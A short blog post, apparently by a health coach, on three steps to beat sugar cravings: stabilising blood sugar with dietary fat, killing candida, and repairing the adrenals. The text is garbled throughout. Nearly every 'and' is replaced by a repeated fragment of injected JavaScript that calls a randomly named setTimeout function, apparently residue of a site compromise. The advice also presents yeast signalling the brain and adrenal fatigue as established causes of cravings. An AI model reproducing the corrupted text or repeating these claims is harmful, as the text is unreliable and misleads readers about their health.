3 Steps to kick your sugar habit

Posted On : January 12, 2017

You weren’t born addicted to sugar.

Somewhere along your path you trained your body to relay on sugar for a fuel source. And now it’s addicted.

So if you trained it, how do you untrain it?

I was a sugar addict for years. I know the pleasure your brain gets from sugar. And I know the pain that comes when you try andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and get off it. It took me twenty years to figure out how to unhook myself.

Here’s what I did:

1.Stabilize your blood sugar

When you eat sugar your blood sugar goes up andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and down. You feel energized andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and happy right after you eat something sugary, but hours later you crash. Your body senses this crash andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and works to bring your blood sugar back up by giving your brain the signal to eat more sugar.

The first step to getting off this rollercoaster is to eat good fat with every meal. When you eat good fat with your meals, you slow the ups andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and downs of your blood sugar. The result is a body that craves less sugar. It’s a beautiful thing!

2.Kill Candom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andida

I had candom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andida BAD for years! It can cause you to be chronically fatigued, mental foggy, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and give you an insane sugar tooth.

What’s candom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andida? It’s a yeast that develops in your small intestine. Usually it happens from repetitive antibiotic use, years on birth control pill, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and from eating a diet high in breads, wine/beer, andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and sugar.

Once the yeast grows, it sends signals to your brain to eat sugar to keep it alive. Kill the yeast andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and the cravings stop.

3.Repair your adrenals

In today’s overscheduled, overstressed world, most people’s adrenals are overworked.

The adrenals give you energy when a stressful event occurs. But if you have over used them, they are not as effective at giving you the energy surge you depend on to get you through the day.

You body is so well designed that when one organ is struggling, it sends signals to other systems to kick in. When the adrenals are fatigued, your brain finds other ways to get that energy surge. Elevating your blood sugar through a diet high in sugar andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and caffeine is one of those ways.

When I go to coach a patient back to health, sugar addiction is one of the most common complaints I hear. Even the worst addictions will turn around when you apply the above strategies.

Hope that helps!
